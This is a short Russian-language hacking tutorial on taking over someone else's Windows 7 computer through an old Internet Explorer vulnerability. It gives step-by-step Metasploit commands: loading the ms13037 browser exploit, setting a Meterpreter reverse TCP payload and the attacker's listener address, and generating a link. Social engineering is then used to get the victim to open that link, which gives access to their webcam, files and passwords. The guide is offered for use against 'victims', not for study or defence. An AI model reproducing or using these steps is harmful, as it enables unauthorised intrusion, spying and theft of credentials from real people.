Получаем доступ к чужому компьютеру через уязвимость в Windows 7
DARK FORCEСуть в том, что мы скинем нашей жертва ссылку, которая расшатает уязвимость в Windows 7 и мы получим доступ к веб-камере, файлам и паролям. Единственная проблема в том, что она должна открыть её через Internet Explorer старой версии, которая стоит на семёрке.
Что нам понадобится:
Kali Linux
Metasploit
Знания СИ (социальной инженерии)
С Kali Linux и СИ вы уже знакомы и пора бы хоть кратко познакомить вас с Metasploit.
Metasploit - одна из популярнейших программ, имеющих самую большую базу эксплоитов, шеллкодов и кучу разнообразной документации, что не может не обрадовать.
Давайте начнём.
Запускаем Metasploit командой "msfconsole".
Выбираем уязвимость браузера. Пишем в командную строку "use exploit/windows/browser/ms13037svgdashstyle".
Далее нужно узнать свой айпи. Пишем в командной строке "ifconfig".
"Set SRVHOST" и через пробел ip жертвы.
Командой "Show Targets" мы можем посмотреть доступные уязвимости.
Выбираем уязвимость IE 8 on Windows 7 SP1, для этого пишем set target 0 (или номер под которым находиться эта строчка).
Выбираем вирус который будет залит жертве. "set PAYLOAD windows/meterpreter/reversetcp".
"Set LHOST" и ваш ip, который вы узнали командой ifconfig.
Выполняем команду "exploit".
У вас отобразится ссылка, которую нужно будет отправить жертве. После открытия у неё ничего не отобразится, никакие файлы скачиваться не будут, а вы получите доступ к компьютеру.